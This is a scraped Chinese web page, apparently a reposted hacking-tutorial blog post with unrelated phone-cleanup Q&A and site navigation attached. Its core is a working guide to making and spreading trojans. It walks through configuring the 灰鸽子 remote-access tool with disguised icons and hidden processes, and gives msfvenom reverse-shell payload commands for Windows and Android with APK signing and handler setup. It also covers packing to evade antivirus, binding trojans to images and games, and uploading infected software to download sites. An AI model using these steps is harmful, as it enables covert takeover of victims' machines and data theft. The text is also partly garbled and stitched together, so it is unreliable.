这个你可以试2113试腾机,它5261可以的扫描一切垃圾4102病毒,自能的1653清理杀毒;用腾讯手机管家设置安全防护、病毒查杀;
先进行扫描,等待扫描结束,按提示杀毒即可.它采用了云查杀技术,可以通过智能云鉴定,把病毒彻底清杀干净,从尔保护你的手机;
试试手机管家的2113顽固查杀
打开腾讯手机管5261—安全防护——设4102—顽固木马专杀
如果是还不行,你1653获取ROOT后清除
打开腾讯手机管家(PC)——应用宝——工具箱——一键ROOT
或刷机
打开腾讯手机管家(PC)——应用宝——工具箱——刷机
进入recovery格机,不然就刷机把。
1. 什么是木马,木马和病毒什么关系
木马(Trojan),也称木马病毒,是指通过特定的程序(木马程序)来控制另一台计算机。
计算机病毒(Computer Virus)是编制者在计算机程序中插入的破坏计算机功能或者数据的代码,能影响计算机使用,能自我复制的一组计算机指令或者程序代码。
木马不传染,病毒传染,木马主要是盗取的密码及其他资料,而病毒是不同程度不同范围的影响电脑的使用
2. 木马的类型
破坏型,密码发送型,远程访问型,键盘记录木马,DoS攻击木马,FTP木马,反弹端口型木马, *** 木马,程序杀手木马
3. 木马的工作原理
攻击者利用一种称为绑定程序的工具将服务器端程序绑定到某个合法软件上,
诱使用户运行该合法软件,用户一旦运行该该合法软件,木马的服务器端程序就在用户毫无知觉的情况下完成安装。
服务器端程序:服务器运行的IP端口号,程序启动时机,如何发出调用,隐身,加密,采用通信方式。
4. msf设置payload相当于是木马
5. 中了木马的机器,就是肉鸡
1.灰鸽子配置服务端
2.服务端传播
3.内网链接控制
灰鸽子是反弹型的木马
环境:虚拟机中两台XP系统,一个作为客户端XP,一个作为服务端XP2,用XP控制XP2
下载灰鸽子2008破解版,在XP中安装,
步骤:
配置服务程序(IP地址或域名)-》XP的IP地址如192.168.254.130
设置链接密码:如888888
设置保存路径
安装选项:是设置服务端安装时的位置,就是XP2中的安装位置
程序图标:设置诱惑性的图标
选中安装成功后自动删除安装文件
启动项设置:在任务管理器中的显示名称:改一下不好识别的名称
描述信息:不能带有木马信息的内容
高级选项:选中使用IEXPLORE.EXE(桌面程序)进程启动服务端程序
选中隐藏服务端进程
选中使用UPX加壳
点击生成服务器
将XP中生成的服务器程序复制到XP2中
XP2中安装,之后安装包自动删除
在XP中的灰鸽子程序里就会发现多了一台电脑
输入之前设置的连接密码888888即可链接这台电脑
出现XP2的C盘信息
4.外网使用木马原理
服务端的IP发送到一个指定的服务器(需要购买租用),在从服务器发到控制端(客户端),从而进行控制
在kali系统中操作
1.生成可执行文件(木马服务端)
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.254.130 LPORT=4444 -f exe > abc.exe
将生成的可执行文件abc.exe复制到XP系统中
2.进入msf,使用handler模块
use exploit/multi/handler
show options
3.设置payload,查看设置,进行设置
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.254.130(本机ip)
4.执行exploit命令进行监听
msf exploit(handler)>exploit
5.受害者执行木马文件
只要XP中安装abc.exe 即可控制XP
执行shell,获取权限
1. 木马怎么被查到的?
根据特征码判定、根据行为判定
2. 加壳绕过杀毒
举例:男生无法进入女生宿舍,可以躲在箱子里,当成衣服搬进去。工具: UPX、北斗程序压缩、ASPack、PE-Armor、ASProtect。
3. 加花绕过杀毒
举例:在网上骂人的话会变成**,可以在中间加空格。加花和上边的加壳,都得用最新的工具才能做到免杀效果,大部分可用工具需要付费。工具:超级加花器、怒剑狂花加花器。
4. 软件保护软件免杀
工具:VMProtect(把木马变成虚拟机软件,然后执行时再释放)
1.换名字和图标
2.捆绑到图片
图片捆绑工具
将exe文件捆绑到图片中,一双击图片就会自动安装木马程序
3.捆绑到软件并且提示
用exeBinder捆绑工具
将木马捆绑到小游戏软件中(杀毒软件会报毒)
4.含有木马的软件提交到下载网站(就可以在他人电脑植入木马)
5.防范:尽量去官网下载软件,尽量找有官网的替代品,尽量用虚拟机。检查启动项,检查进程。
在kali中操作
1. 生成安卓木马
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.254.130 LPORT=4444 R > aaa.apk
2.创建证书
keytool -genkey -v -keystore apk-trojan-key.keystore -alias aaa -keyalg RSA -keysize 1024 -validity 999
出现需要输入内容随便填写,记住输入的密码就行
3.签名并验证
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore aaa.apk aaa
jarsigner -verify -verbose aaa.apk
4.使用Zipalign优化apk,忘掉这一步部分手机会无法安装
安装Zipalign:apt-get install zipalign (这是linux安装软件的命令)
优化:zipalign -v 4 aaa.apk aaaa.apk
在kali主文件中找到aaaa.apk(为了发送给安卓用户)
虚拟机中安装安卓系统,在kali中ping通安卓系统(也可以用夜神模拟器等)
5.启用metasploit加载模块并设置反弹链接
use exploit/multi/handler 加载攻击模块
set payload android/meterpreter/reverse_tcp
set options
set LHOST 192.168.254.130
执行监听命令;exploit
选择要使用的Payload
设置需要进行配置的地方
6.受害者安装并执行木马
本文内容摘自网易云课堂讲师董文磊
更多精彩内容及细节学习:请到网易云课堂董文磊讲师专题学习
*** 工程师董文磊
转载请注明:zchao博客之家 黑客入门学习之木马病毒 *** 与使用
怎么样在Win10中使用PowerShell批量新建文件
使用Win10自带破解邮箱密码-破解qq密码-破解qq空间-破解苹果id-破解rar压缩文件-攻击-入侵-服务器-后台照片检察器的步调
办理Win7注册表写入失败的 *** 本领
那些从未听过的高危用户权限
使用Discuz e2dk地址XSS挂马阐发报告(针对
利用动态符号实行举行代码覆盖测试
CVE-2016-7255:Virtual Memory, Page Tabl
利用原生Windows函数执行shellcode
解密使用谷歌云消息办事的Android锁屏恶意软
利用AS-REQ打击Kerberos
hook Android体系调用的乐趣和好处
我可能是用了假的隐身模式
1月21日 - 逐日安全知识热门
黑客曝光数百名英美高官电子邮箱和暗码
今日热门 更多>>
男子 *** 软件 微信付款码外泄被骗5000多元
安全焦点
更多
21日黑客曝光数百名英美高官电子邮箱和密码
21日美媒:别老盯着俄黑客不放 联俄抗中才是正事
21日黑客新发现:三个字符就可以让iPhone崩溃
21日根除信息黑市须打内鬼防黑客
21日北约称其每个月会受到500次黑客攻击
21日专家支招怎样应对交易场所之黑客
21日华盛顿上空的烟花 美网友再次感受俄罗斯黑客的恐
21日北京网警一年破案3400余起 集中在黑客 *** 诈骗
21日2017年1月21日被黑网站曝光
21日甲骨文 VirtualBox高危堆溢出漏洞(CVE-2017-33
21日MongoDB、Elasticsearch遭大范围挟制,如何才能
19日黑客组织Anonymous威胁揭露川普和俄罗斯黑社会勾
热门图文
使用Frida配合Burp Suite追踪API调用
瑞星2016年中国信息安全报告
有关变乱相应(IR)自动化和协同的几点反
2016年,你被 DDoS 了吗?海内外数据大盘
怎么样可以或许安全删除Windows10Upgrade文件
在Windows系统中设置定期修改密码功效的方
规复不见了的Win10快速启动栏的 ***
解决Win7看视频时忽然出现watchdog.sys蓝
怎么样在Win10中使用PowerShell批量新建文
使用Win10自带的照片查看器的步骤
解决Win7注册表写入失败的 *** 技巧
那些从未听过的高危用户权限
漏洞公告CVE-2016-7255:Virtual Memory, Page TaCVE-2016-7290: 微软office word的整数下CNNVD:关于微信“藏蛟”漏洞情况的通报MS16-137:LSASS长途拒绝服务漏洞分析PHPMailer任意文件读取漏洞分析(CVE-201安卓漏洞:攻击Nexus6和6p自定义引导模式SwiftMailer、PhpMailer和ZendMail被爆RC
*** 安全漏洞预警脚本安全网站安全逆向工程网站安全
一个小白的Arp攻防实 坦白讲,我是个小白,也就是各大黑客和安全厂商所说的目标..
渗出测试技能之另类Windows提权21日
BlackHole重出江湖:一次针对专业军事论坛的19日
看我如何利用漏洞窃取麦当劳网站注册用户密19日
技术干货:MySQL数据库Root权限MOF *** 提权18日
入侵安全检测创科 *** 16日
如何用技术手段知道男/女朋友的社交账号密14日
如何找到SQL注入中的盐11日
超越检测:利用Burp Collaborator执行SQL盲10日
漏洞补丁
Nginx Code Executi昨晚黑锅在微博上发了老外爆的Nginx漏洞,开始并没几个人..
在Python中重构vsFTPd后门漏洞19日
Apache shiro 1.2.4版本远程命令执行漏洞详18日
BROP Attack之Nginx远程代码执行漏洞分析及17日
XSSI: 一个不出名但是影响广泛的Web漏洞17日
英特尔部分Skylake处置惩罚器存在漏洞:可通过U16日
苹果AppStore现严重Bug:热门搜索被转到彩票15日
CVE-2015-1860分析:Qt模块处理gif图导致崩14日
使用任天堂的6502处理器指令对桌面版Linux系14日
脚本攻防
[黑产科普]最近大规 小八卦下黑产这几天收到一些朋友的留言说希望能科..
利用Discuz e2dk地址XSS挂马分析报告(针对21日
Snuck:一款自动化XSS漏洞扫描东西14日
GUN sed高级用法,sed脚本编写25日
跨站脚本傻瓜指南 – Hacker Noon23日
python多进程编程18日
python 暴力破解SSH18日
CSRF实战:借刀杀人之全民助我投诉吧主17日
XSS实战:我是如何拿下你的百度账号17日
操作系统
怎么样能够安全删除Windows10Upgrade文件21日
在Windows系统中设置定期修改密码功能的 *** 21日
恢复不见了的Win10快速启动栏的 *** 21日
解决Win7看视频时突然出现watchdog.sys蓝屏21日
怎么样在Win10中使用PowerShell批量新建文件21日
使用Win10自带的照片查看器的步骤21日
解决Win7注册表写入失败的 *** 技巧21日
解决Win10搜索无法解决的技巧19日
如何处理Win8找不到cmd运行选项的问题19日
在Win10中开启桌面预览功能的步骤19日
在Win7中运用组策略编辑器禁用命令提示符的19日
如何处理win10安装累积更新补丁后无法开机的19日
服务器技术
使用阿里云免费证书在 Ubuntu Apache 上搭建21日
VPS/服务器优化 *** 、加速 *** 总结与参考19日
在腾讯云服务器中重装 Windows 系统为 Arch19日
安装Exchange邮件系统16日
docker1.12+swarmkit16日
docker资源限制及应用16日
docker *** 技术分析16日
centos7.2 安装 mysql5.7.13&&加密(ssl)实现16日
Nginx反向 *** ,负载均衡+Tomcat实现Sessio16日
Virtual Box配置CentOS7 *** (图文教程)15日
Centos MySQL 5.7 安装、升级具体教程15日
CentOS 7配置LNMP开发环境及配置文件管理15日
*** 技巧
解决win7系统word打不开的技巧19日
揭秘职业手游“托” 高级“托”月入可过万19日
手游玩家请注意:手游托儿的常用手法揭秘19日
给微信聊天进行换行的步骤17日
恢复异常消失的微信聊天记录的 *** 技巧17日
微信AED地图应用范围的详细介绍17日
使用电蚊拍DIY USBKILL16日
局域网IP冲突的排查 *** ,网管必备16日
解决Win7系统word出现已停止工作的 *** 16日
*** 无法启用共享访问错误1061解决 *** 16日
使用火狐浏览器实现快速抓包 *** 步骤15日
大限将至 360云盘中的数据你不加速拯救下?15日
安全频道WEB安全系统安全 *** 安全邮件安全抗DDOS专区Web安全
使用Frida配合Burp Suite追踪API调用21日
什么是流量劫持,如何防止流量劫持?19日
一场屠戮MongoDB的盛宴反思:超33000个数据18日
绕过网站安全狗拦截,上传Webshell技巧总结17日
互联网黑势力之流量劫持12日
看我是如何跟羊毛党战斗的之我也变成羊毛党12日
使用Burp的intruder功能测试有csrf保护的应10日
如何全面防备Webshell(下)?08日
如何全面防御Webshell(上)?08日
使用Docker搭建Web漏洞测试环境28日
新手指南:DVWA-1.9全级别教程(完结篇,附27日
华为内部web安全法则25日
病毒防范
解密使用谷歌云消息服务的Android锁屏恶意软21日
革命性创新?走近“高水准”新型打单软件Sp21日
解密一个反杀毒恶意驱动18日
解病毒起源 抵御黑客入侵14日
针对升级后Shifu银行木马的深度分析14日
盘点2016年针对苹果Mac系统的恶意软件(附样12日
一款恶性Rootkit木马分析 ——“狼人杀”木11日
付了钱也不解锁:进化为勒索软件的KillDisk11日
一款惊艳的Rootkit分析- Wingbird11日
剖析Mamba-磁盘加密型勒索软件11日
TrickBot – 银行木马Dyreza的继承者10日
DeriaLock勒索木马最新变种分析10日
系统安全
瑞星2016年中国信息安全报告21日
有关事件响应(IR)自动化和协同的几点反思21日
利用动态符号执行进行代码覆盖测试21日
利用AS-REQ攻击Kerberos21日
我可能是用了假的隐身模式21日
1月21日 - 每日安全知识热点21日
网站安全性测试工具有哪些?19日
如何破解12位+字符的高强度密码19日
针对NETFLIX的新型钓鱼攻击的精妙之处19日
1月19日 - 每日安全知识热点19日
《信息基础设施三年行动方案》发布,安全防19日
方程式组织EQUATION DRUG平台解析(提纲)19日
软件,教程,电子书最近更新
技术视频教程
白帽黑客入侵渗透检测技术详解教程
比较详细入侵网站后台拿webSHELL
VM虚拟机各种垃圾问题导致不能打开的解决办
黑客入侵渗透检测技术简单旁注教程
黑客攻防之php自定义拿webshell
带你深入熟悉你所不知道的ICMP
php+mysql注入拿webshell到脱库(全过程)
安全相关
科来 *** 分析系统 V9.1.0.9130
天互服务器安全设置工具2016 v1.0版
网站安全狗 IIS版 V4.0
服务器安全狗(DDOS防火墙、ARP防火墙)v5.
Malwarebytes Anti-Malware v3.0.2.1175 Be
火绒互联网安全软件 v4.0.0.37
路由优化大师 v4.1.8.78
电子书下载
LDAP使用手册 PDF
网页设计与 *** 实用教程中文PDF版
操作系统原理及应用(Linux) PDF扫描版
学习Nginx HTTP Server(中文版) PDF扫描版
黑客攻防三十六计 PDF版 附光盘
架构变革-云计算的架构 ppt版
.Net Micro Framework嵌入式开发入门与典型
服务器相关
远程桌面助手 1.6
PHP For Windows 7.1.0 RC 1 官方最新版
56主机网服务器管理助手 1.1 官方版
微润IIS批量建站工具 4.0
护卫神Apache建站大师
云文件加密工具-Cryptomator v1.2.2
网站安全狗Apache版本 v3.5
前段时间向人人推荐过这个影戏,详见 热片推荐:《疯狂动物城》 引起了一大波的观影热潮,确实是最近少有的动画佳作。 搞笑又内在,老少皆宜,豆瓣评分9.3分,是迪士尼出品的仅次于《狮子王》的第二好动...
坚信大伙儿都是有感受到2020年的冬季会要比别的情况下冷一些,因而大家都很想要知道今年天气为何那么冷受哪些危害,并且今年的天气变化也是大伙儿要想了解为何那么出现异常,因而2020年天气异常的原因是什么...
稳住就是拿年终奖金,然后再次辞职。对于这个行业来说,工作变动非常快。如果你感到疲倦或不高兴,你会立即辞职。首先,本文以我公司为例,在新年结束后,我公司还吸引了每年一度的招聘会,我主要负责公司的电子商务...
当今,固然上网很利便,但许多小同伴秀都稀饭用少许小贴士。许多人想晓得微信是否能隐秘定位密友地位,但连续没有人发掘。辣么该奈何做呢?咱们和小编一路来看看。微信怎么定位不让他知道微信的定位能不被对方发觉吗...
随着互联网的不断发展,许多企业意识到需要在互联网上建立网站来展示自己的企业形象。然而,我们经常缺乏对如何提高网站安全性的正确理解。 建立一个网站很容易,但是维护网站的安全性却不容易。随着网络攻击逐年...
相信现在有很多的朋友们对于外地住房公积金在本地购房怎么用都想要了解吧,那么今天小编就来给大家针对外地住房公积金在本地购房怎么用进行一个介绍吧,希望小编介绍的内容能够为大家起到帮助哦 你好,现在可以异地...